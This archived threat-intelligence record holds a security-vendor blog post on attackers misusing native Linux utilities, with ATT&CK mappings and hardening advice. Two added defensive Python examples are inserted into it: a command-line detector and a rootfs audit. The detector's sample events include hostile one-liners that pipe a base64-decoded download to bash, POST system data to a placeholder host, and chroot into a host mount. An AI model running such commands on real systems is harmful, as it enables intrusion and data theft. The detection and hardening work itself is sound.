{
	"id": "4b778185-e6fb-4c14-a2b8-08d4575dbdf5",
	"created_at": "2026-04-06T00:22:17.303142Z",
	"updated_at": "2026-04-12T02:21:29.09163Z",
	"deleted_at": null,
	"sha1_hash": "b6a5c5bccc2a16996f0ca1c6bb61315b70a3d343",
	"title": "How Malicious Actors Abuse Native Linux Tools in Their Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1455984,
	"plain_text": "How Malicious Actors Abuse Native Linux Tools in Their Attacks\r\nBy Nitesh Surana, David Fiser, Alfredo Oliveira\r\nPublished: 2022-09-08 · Archived: 2026-04-05 23:06:59 UTC\r\nCloud\r\nThrough our honeypots and telemetry, we were able to observe instances in which malicious actors abused native\r\nLinux tools to launch attacks on Linux environments. In this blog entry, we discuss how these utilities were used\r\nand provide recommendations on how to minimize their impact.\r\nBy: Nitesh Surana, David Fiser, Alfredo Oliveira Sep 08, 2022 Read time: 7 min (1973 words)\r\nIntroduction\r\nContainer adoption has become mainstream, with usage having risen across organizations globally. Based on a\r\nsurvey from CNCF, 93% of respondents are currently using or planning to use containers in production.\r\nContainer orchestration projects like Kubernetes and other tools available in the cloud and across the internet have\r\nled to a wave of transformations in how organizations operate, from monolithic architectures to the creation of\r\ndistributed systems consisting of microservices.\r\nHowever, these changes have also expanded the attack surface, particularly through security\r\nmisconfigurations or vulnerabilities introduced in the deployments. Cloud security is further\r\ncomplicated by the fact that patch management can often be an enormous undertaking for organizations, which\r\nmeans that updates are not always implemented in a timely manner.\r\nWhen it comes to public-facing web applications, we have been observing critical vulnerabilities arising from a\r\nwide range of sources, ranging from vulnerable open-source libraries (Log4Shell and Spring4Shell) to\r\nframeworks (Apache Struts and Drupal), and even applications such as Atlassian Confluence, Oracle WebLogic\r\nServer, and Apache HTTP Server. 
Once proof-of-concepts (POCs) for vulnerabilities are disclosed, attackers can\r\nexploit them to perform malicious tasks ranging from mining cryptocurrency to, at times, deploying ransomware.\r\nFrom the perspective of a defender, the ideal outcome would be to prevent the attacker from even gaining an\r\ninitial foothold. However, this is not always the case. If an attacker does manage to enter the system, it is the\r\ndefender’s job to make it more difficult for the attacker to successfully pull off their routines by using defense-in-depth strategies.\r\nThrough our network of honeypots and verbose telemetry, we were able to observe some interesting\r\ncharacteristics in most of the successful exploit attempts, in particular, how attackers use native Linux tools in\r\ntheir routines.\r\nhttps://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\r\nPage 1 of 14\n\nExamining attacks using legitimate utilities and tools on Linux environments\r\nAn attack on a Linux-based system typically follows a standard exploitation chain. First, an attacker exploits a\r\nvulnerability (or a chain of vulnerabilities) to gain initial access into the environment (which we can now consider\r\ncompromised). From there, an attacker may take different paths to move further inside the compromised\r\nenvironment:\r\n1. Enumerating the context of the current environment (Discovery)\r\n2. Exfiltrating sensitive data from the environment (Exfiltration, Impact)\r\n3. Performing a denial-of-service attack by removing the application (Impact)\r\n4. Mining cryptocurrency by downloading miners (Impact)\r\n5. Attempting other techniques (Privilege Escalation, Lateral Movement, Persistence, or Credential Access)\r\nFigure 1. 
How an attacker can pivot further within a compromised environment\r\nBased on real-world attacks and our honeypots, we observed malicious actors abusing a variety of tools\r\nthat come bundled with Linux distributions, such as curl, wget, chmod, chattr, ssh, base64, chroot, crontab, ps, and\r\npkill, for nefarious purposes.\r\nWe have seen malicious actors abusing these tools in the wild. The presence of these utilities, especially inside\r\ncontainer images, should at least be weighed, since they give attackers additional avenues once they are in.\r\nLet’s examine some real-world attacks and instances of abuse that we observed via Trend Micro Cloud One™ and\r\nVision One.\r\nFigure 2. Using base64 to decode the payload for later execution\r\nThe base64 tool is a Linux utility that encodes data to, and decodes strings from, base64 format. Attackers often obfuscate their\r\npayloads and commands using base64 encoding to evade detection (T1027), a technique we describe in detail in\r\nour previous article, The Evolution of Malicious Shell Scripts.\r\nFigure 3. Using the “cat” process to view the .bash_history for all users\r\nThe .bash_history file, which is stored in each user’s home directory, logs the commands that user executed in their\r\nbash shell. Attackers have been known to extract information from these files to understand the context of the\r\ncurrent environment, as we previously detailed in another article, Misconfigured Docker Daemon API Ports\r\nAttacked for Kinsing Malware Campaign.\r\nFigure 4. 
Using the “cat” process to view /etc/passwd\r\nAs part of the enumeration step, the attacker reads the /etc/passwd file, which lists the accounts registered\r\nin the environment and shows whether a given account has a login shell. This\r\ninformation helps the attacker understand the environment and pinpoint users of value (T1003.008).\r\nFigure 5. Using “chattr” to make the /etc/crontab file mutable again\r\nThe chattr utility changes file attributes on Linux file systems; the immutable (i) attribute, in particular, prevents a\r\nfile from being modified, renamed, or deleted, even by root, until the attribute is cleared with chattr -i. The example in\r\nFigure 5 shows the attributes of /etc/crontab being altered so that the file can be written to again, removing a protection a\r\ndefender may have relied on. This utility has previously been observed being abused by TeamTNT, as discussed in our\r\nwhite paper, Tracking the Activities of TeamTNT.\r\nFigure 6. Using “chmod” to make a file executable\r\nThe chmod tool changes a file’s mode bits, granting read, write, and execute permission separately to the owner, the group,\r\nand everyone else. It is required to execute newly downloaded files, and in this case we see the file agettyd under /tmp\r\nbeing given the executable bit.\r\nFigure 7. Using “crontab” to remove all existing cron jobs\r\ncron is the standard Linux job scheduler, and a crontab is the list of scheduled jobs it runs. Attackers have been known to abuse\r\ncron and modify crontabs for execution, persistence, and, at times, privilege escalation (T1053.003). The\r\nexample in Figure 7 shows the removal of all existing cron jobs (crontab -r deletes the invoking user’s entire crontab). This is\r\ncommon where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum\r\namount of resources possible. 
Our blog entry, War of Linux Cryptocurrency Miners: A Battle for Resources, discusses these\r\nactivities in depth.\r\nFigure 8. Using “curl” to exfiltrate system information to the attacker\r\nThe curl, or cURL, utility transfers data over a range of protocols, such as HTTP, HTTPS, and File\r\nTransfer Protocol (FTP). The example in Figure 8 shows system information such as the OS version and\r\nrelease version being sent as a POST request to the attacker’s infrastructure.\r\nFigure 9. Using “curl” to download xmrig binaries from GitHub\r\nFigure 10. Using “pkill” to kill competing processes/coinminers\r\nThe pkill utility, part of procps alongside pgrep, sends a signal to every process whose name matches a pattern. Its default\r\nsignal is SIGTERM, so sending SIGKILL, as in the example in Figure 10, requires the -9 (or -KILL) option; here it is sent to the\r\nprocess named “kdevtmpfsi”. We have been observing cryptocurrency miners named\r\nkdevtmpfsi as early as 2020. Our blog entry, Analysis of Kinsing Malware's Use of Rootkit, shows another\r\nexample of a competing miner being terminated.\r\nFigure 11. Using “ps” to view running processes\r\nThe ps utility reports the status of processes. Figure 11 shows the ps aux command fetching verbose\r\ninformation about every process on the system, such as its process ID, owning user, and resource usage. This\r\ninformation helps attackers perform discovery (T1057 – Process\r\nDiscovery) and learn about the environment they are in.\r\nFigure 12. 
Using “rm” to remove hidden files from the /tmp directory\r\nIn Figure 12, we see the rm tool being used to delete the hidden files and folders under the /tmp directory.\r\nAttackers create hidden files and directories to evade detection by prefixing the name with “.” (Hide\r\nArtifacts: Hidden Files and Directories - T1564.001); deleting them removes such artifacts.\r\nFigure 13. Using “ssh” to infect the underlying host with XMR miners\r\nThe ssh utility is the client used to access remote systems over Secure Shell (SSH); attackers use it to spread in a worm-like fashion. In\r\nFigure 13, the attacker tries to download the Monero miner (using wget or curl) and infect the machine to which the\r\nSSH connection is made (127.0.0.1). Once attackers have mounted the underlying host’s file system because of an\r\nunsecure container configuration (for example, a privileged container), they create a new pair of SSH keys, use\r\nit to establish an ssh session, and infect the underlying host with cryptocurrency miners.\r\nFigure 14. Using “wget”, “curl”, and “chmod” to download and execute Mirai malware\r\nIn this example, we see the combined use of different Linux utilities: the binary is downloaded,\r\nits permissions are modified, and it is then executed. The executable named “runnable” is a Mirai sample delivered\r\nafter exploitation of the Log4Shell vulnerability tracked as CVE-2021-44228.\r\nFigure 15. Using “whoami” to view the current user context\r\nFigure 16. Workbench showing an attacker using “chroot” and “base64”\r\nUsing the Vision One workbench, we see the chroot and base64 utilities being used by an attacker. 
Note that\r\nchroot is used to change the root to the directory supplied (in this case, /host), where the underlying host’s file\r\nsystem is mounted within the container. With the host’s file system as its root, every file operation the attacker performs\r\nafterwards lands on the host rather than in the container. We explore the weakness posed by this capability when granted to a\r\ncontainer in our article, Why A Privileged Container in Docker is a Bad Idea.\r\nBest practices for protecting Linux systems from utility abuse\r\nFrom the techniques discussed in the previous section, we see that attackers rely on a set of tools that\r\ncome bundled with a full-scale operating system. As defenders, it is safer to build container images that\r\ncontain only the tools we require and to remove the tools that are not needed.\r\nThis approach can mitigate risk to a great extent, even against critical vulnerabilities such as\r\nLog4Shell: an exploit that lands in a container without curl, wget, or a shell has far fewer ways to fetch and run a second stage.\r\nReducing the number of tools shipped with an application also reduces the attack surface introduced\r\nby vulnerabilities in the dependencies of those open-source libraries and tools. This is where distroless images come in:\r\nthey are images that contain only the application and its runtime dependencies, doing away with the\r\nprograms you would expect to find in a typical Linux distribution, such as package managers and shells.\r\nFrom a defender’s perspective, the focus should be on disabling, or rather disarming, the attacker via defense-in-depth. While changes to the system that minimize or even prevent abuse help, a\r\nmultilayered approach that combines several security measures provides the strongest protection,\r\nideally pairing best practices with effective defense technologies.\r\nFor non-containerized environments, Cloud One Workload Security provides the Application Control module,\r\nwhich monitors software changes and allows or blocks them based on the configured policy. 
It creates a baseline of\r\nthe existing applications and applies the rules to new applications that are downloaded and installed. It identifies each\r\nbinary by its SHA-256 hash.\r\nIt provides options for users to do the following:\r\n1. Block unrecognized software until explicitly allowed\r\n2. Allow unrecognized software until explicitly blocked\r\nWe downloaded a pre-compiled binary of the nmap network enumeration tool from GitHub using wget on an\r\nUbuntu 20.04 long-term support (LTS) server. The server was then configured with the Cloud One Workload\r\nSecurity agent running with the Application Control module set to ‘Block’ mode for unrecognized software. As\r\nshown in Figure 17, the execution was prevented by Application Control.\r\nFigure 17. Preventing the execution of the “nmap” binary using the Application Control module\r\nfrom Cloud One Workload Security\r\nFigure 18. The corresponding event on Cloud One Workload Security, where we see that the\r\n“nmap” binary was blocked from being executed\r\nConclusion\r\nWith attackers making use of legitimate tools and utilities that are built into the operating system, defenders will\r\nneed to prioritize how they set up controls during the different phases of an attack. Minimizing the attack\r\nsurface by using distroless images in containers and applying preventive controls like Cloud One Workload\r\nSecurity’s Application Control go a long way in slowing down attackers targeting cloud environments. In cases\r\nwhere organizations cannot go with a distroless implementation, “slimmed-down” versions of the same images\r\ncan also be used to reduce the attack surface and strengthen the security of cloud deployments. 
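The tool-abuse patterns catalogued in Figures 2 through 16 above, turned into a small detection pass over process-execution events, as an added example that is not code from the article or from Trend Micro. The sample command lines are constructed to mirror the figures (hosts under example.invalid are placeholders); the ATT&CK IDs the article cites (T1027, T1003.008, T1053.003, T1057, T1564.001) are kept, and the remaining mappings (T1552.003, T1222.002, T1105, T1041, T1496, T1070.004, T1021.004, T1611, T1033) are this example’s own. The stage splitter is token-based rather than a full shell parser, so heavily obfuscated one-liners can slip past it; the point is the shape of the rules, not completeness.

```python
import shlex

# Constructed sample process-execution events, not taken from the article's
# figures: each is a command line as an EDR or auditd sensor would record it.
SAMPLE_EVENTS = [
    'echo Y3VybCAtcyBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL3guc2ggfCBzaA== | base64 -d | bash',
    'cat /root/.bash_history /home/*/.bash_history',
    'cat /etc/passwd',
    'chattr -i /etc/crontab',
    'chmod +x /tmp/agettyd',
    'crontab -r',
    'curl -X POST -d os=linux http://example.invalid/report',
    'curl -L -o /tmp/x.tgz https://example.invalid/xmrig-linux-static-x64.tar.gz',
    'pkill -9 kdevtmpfsi',
    'ps aux',
    'rm -rf /tmp/.X11-unix /tmp/.hidden',
    'ssh -o StrictHostKeyChecking=no root@127.0.0.1 wget http://example.invalid/x -O /tmp/x',
    'chroot /host /bin/bash',
    'whoami',
    'ls -la /var/log',
]

SHELLS = {'sh', 'bash', 'dash', 'ash', 'zsh'}
DOWNLOADERS = {'curl', 'wget'}
READERS = {'cat', 'less', 'more', 'head', 'tail', 'grep', 'strings'}
MINER_NAMES = {'xmrig', 'kdevtmpfsi', 'kinsing'}     # names that appear in the article
SCRATCH_DIRS = ('/tmp/', '/var/tmp/', '/dev/shm/')
CRON_PATHS = ('/etc/cron', '/var/spool/cron')
UPLOAD_FLAGS = ('-d', '--data', '--data-binary', '--data-raw', '-F', '--form',
                '-T', '--upload-file', '--post-data', '--post-file')


def basename(path):
    return path.rstrip('/').rsplit('/', 1)[-1]


def parse_stages(cmdline):
    # Split a one-liner into its pipeline/compound stages, each an argv list.
    # This is a token-level split, not a full shell parser (assumption).
    try:
        tokens = shlex.split(cmdline)
    except ValueError:                 # unbalanced quotes: degrade gracefully
        tokens = cmdline.split()
    stages, current = [], []
    for tok in tokens:
        if tok in ('|', '||', '&&', ';'):
            if current:
                stages.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        stages.append(current)
    return stages


def has_upload(args):
    # curl -d/-F/-T and wget --post-* send a body; so does -X POST or PUT.
    if any(a in UPLOAD_FLAGS or a.startswith(('--post-data=', '--post-file=', '--data=')) for a in args):
        return True
    return any(a in ('-X', '--request') and args[i + 1].upper() in ('POST', 'PUT')
               for i, a in enumerate(args[:-1]))


def classify(cmdline):
    # Return the set of ATT&CK technique IDs the command line matches.
    hits = set()
    stages = parse_stages(cmdline)
    for i, argv in enumerate(stages):
        cmd, args = basename(argv[0]), argv[1:]
        nxt = basename(stages[i + 1][0]) if i + 1 < len(stages) else ''
        if cmd == 'base64' and any(a in ('-d', '--decode') for a in args) and nxt in SHELLS:
            hits.add('T1027')          # decode-then-execute of an encoded payload
        if cmd in READERS:
            if any(basename(a) == '.bash_history' for a in args):
                hits.add('T1552.003')  # shell history harvesting
            if any(a in ('/etc/passwd', '/etc/shadow') for a in args):
                hits.add('T1003.008')  # account enumeration / credential dumping
        if cmd == 'chattr' and any(a.startswith(CRON_PATHS) for a in args):
            hits.add('T1222.002')      # toggling immutable bits on cron config
        if cmd == 'chmod' and any(a.startswith(SCRATCH_DIRS) for a in args):
            hits.add('T1222.002')      # making a dropped file executable
        if cmd == 'crontab' and ('-r' in args or '-' in args):
            hits.add('T1053.003')      # wiping or replacing the crontab
        if cmd in DOWNLOADERS:
            if has_upload(args):
                hits.add('T1041')      # data pushed to remote infrastructure
            elif any(a.startswith(('http://', 'https://', 'ftp://')) for a in args):
                hits.add('T1105')      # ingress tool transfer
            if any(m in a.lower() for a in args for m in MINER_NAMES):
                hits.add('T1496')      # fetching a known miner
        if cmd in ('pkill', 'killall', 'kill') and any(basename(a) in MINER_NAMES for a in args):
            hits.add('T1496')          # killing a competing miner
        if cmd in ('ps', 'top', 'pgrep'):
            hits.add('T1057')          # process discovery
        if cmd == 'rm':
            targets = [a for a in args if not a.startswith('-')]
            if targets:
                hits.add('T1070.004')  # file deletion
            if any(basename(t).startswith('.') for t in targets):
                hits.add('T1564.001')  # hidden files/directories involved
        if cmd == 'ssh' and any(basename(a) in DOWNLOADERS | SHELLS for a in args):
            hits.add('T1021.004')      # ssh used to run a downloader or shell remotely
        if cmd == 'chroot' and args and args[0] != '/':
            hits.add('T1611')          # chroot into a mounted host file system
        if cmd in ('whoami', 'id'):
            hits.add('T1033')          # user context discovery
    return hits


def scan(events):
    # Map each event to its sorted technique IDs; events matching nothing are dropped.
    results = {}
    for event in events:
        ids = classify(event)
        if ids:
            results[event] = sorted(ids)
    return results


if __name__ == '__main__':
    for event, ids in scan(SAMPLE_EVENTS).items():
        print(', '.join(ids).ljust(22), event)
```

Run it as-is to see the fourteen constructed events that match and the one benign ls that does not. In a real deployment the same classify() would sit behind whatever feeds you process events (auditd execve records, an eBPF sensor, container runtime audit logs), and the container-specific rules (chroot into a mounted host path, chmod of a freshly dropped file in /tmp) are the ones worth alerting on at high severity, because a legitimate workload in a slimmed image should never produce them.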
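An added example for the image-slimming recommendation above, not code from the article: a check to run over a `docker export` tree (or any mounted root file system) that lists which of the utilities named in this post are still present and whether they are busybox applet symlinks, which matters because removing the symlink does not remove the applet. The sample tree is constructed in a temporary directory; the tool list and the set of binary directories are this example’s assumptions.

```python
import os
import tempfile
from pathlib import Path

# Utilities the article lists as abused, plus the shells needed to drive them.
ATTACKER_TOOLS = ('curl', 'wget', 'chmod', 'chattr', 'ssh', 'base64', 'chroot',
                  'crontab', 'ps', 'pkill', 'sh', 'bash')
BIN_DIRS = ('bin', 'sbin', 'usr/bin', 'usr/sbin', 'usr/local/bin', 'usr/local/sbin')


def audit_rootfs(root):
    # Map each listed tool to where it lives in an exported rootfs (first hit wins)
    # and, for symlinks, to the link target; tools that are absent are not listed.
    root = Path(root)
    found = {}
    for d in BIN_DIRS:
        for tool in ATTACKER_TOOLS:
            p = root / d / tool
            if tool in found or not (p.is_file() or p.is_symlink()):
                continue
            target = os.readlink(p) if p.is_symlink() else None
            found[tool] = {'path': f'/{d}/{tool}', 'link_to': target}
    return found


def busybox_present(root):
    # With a busybox binary every applet stays reachable as `busybox wget`,
    # so deleting the applet symlinks alone does not remove the capability.
    return any((Path(root) / d / 'busybox').exists() for d in BIN_DIRS)


def summarize(root):
    found = audit_rootfs(root)
    return {
        'present': sorted(found),
        'absent': sorted(t for t in ATTACKER_TOOLS if t not in found),
        'busybox': busybox_present(root),
    }


def build_sample_rootfs():
    # Constructed stand-in for a `docker export` tree (not a real image): a
    # busybox-style layout where wget/ps/pkill/base64/sh/chmod are applet
    # symlinks, chroot is a symlink with an absolute target, curl is a real
    # binary, and ssh/bash/crontab/chattr are not installed at all.
    root = Path(tempfile.mkdtemp(prefix='rootfs-'))
    (root / 'bin').mkdir()
    (root / 'usr' / 'bin').mkdir(parents=True)
    (root / 'bin' / 'busybox').write_bytes(b'ELF')
    for applet in ('wget', 'ps', 'pkill', 'base64', 'sh', 'chmod'):
        (root / 'bin' / applet).symlink_to('busybox')
    (root / 'usr' / 'bin' / 'chroot').symlink_to('/bin/busybox')
    (root / 'usr' / 'bin' / 'curl').write_bytes(b'ELF')
    return str(root)


if __name__ == '__main__':
    sample = build_sample_rootfs()
    for tool, info in audit_rootfs(sample).items():
        print(tool.ljust(8), info['path'], info['link_to'] or '')
    print(summarize(sample))
```

Point it at the directory produced by `docker export <container> | tar -x -C <dir>` and treat a non-empty present list on a production image as a finding: either the tool is needed at runtime and should be justified, or the image is a candidate for a distroless or slimmed base. When busybox is reported, removing individual applet links is cosmetic; the busybox binary itself has to go.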
\r\nSource: https://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html"
	],
	"report_names": [
		"how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-12T02:00:04.986191Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f809bfcb-b200-4988-80a8-be78ef6a52ef",
			"created_at": "2023-01-06T13:46:39.186988Z",
			"updated_at": "2026-04-12T02:00:03.31996Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"Adept Libra"
			],
			"source_name": "MISPGALAXY:TeamTNT",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c3ca592f-0669-49bd-ab5c-310007ab2fb4",
			"created_at": "2022-10-25T15:50:23.334495Z",
			"updated_at": "2026-04-12T02:00:04.375091Z",
			"deleted_at": null,
			"main_name": "TeamTNT",
			"aliases": [
				"TeamTNT"
			],
			"source_name": "MITRE:TeamTNT",
			"tools": [
				"Peirates",
				"MimiPenguin",
				"LaZagne",
				"Hildegard"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-12T02:00:03.381815Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434937,
	"ts_updated_at": 1775960489,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b6a5c5bccc2a16996f0ca1c6bb61315b70a3d343.pdf",
		"text": "https://archive.orkl.eu/b6a5c5bccc2a16996f0ca1c6bb61315b70a3d343.txt",
		"img": "https://archive.orkl.eu/b6a5c5bccc2a16996f0ca1c6bb61315b70a3d343.jpg"
	}
}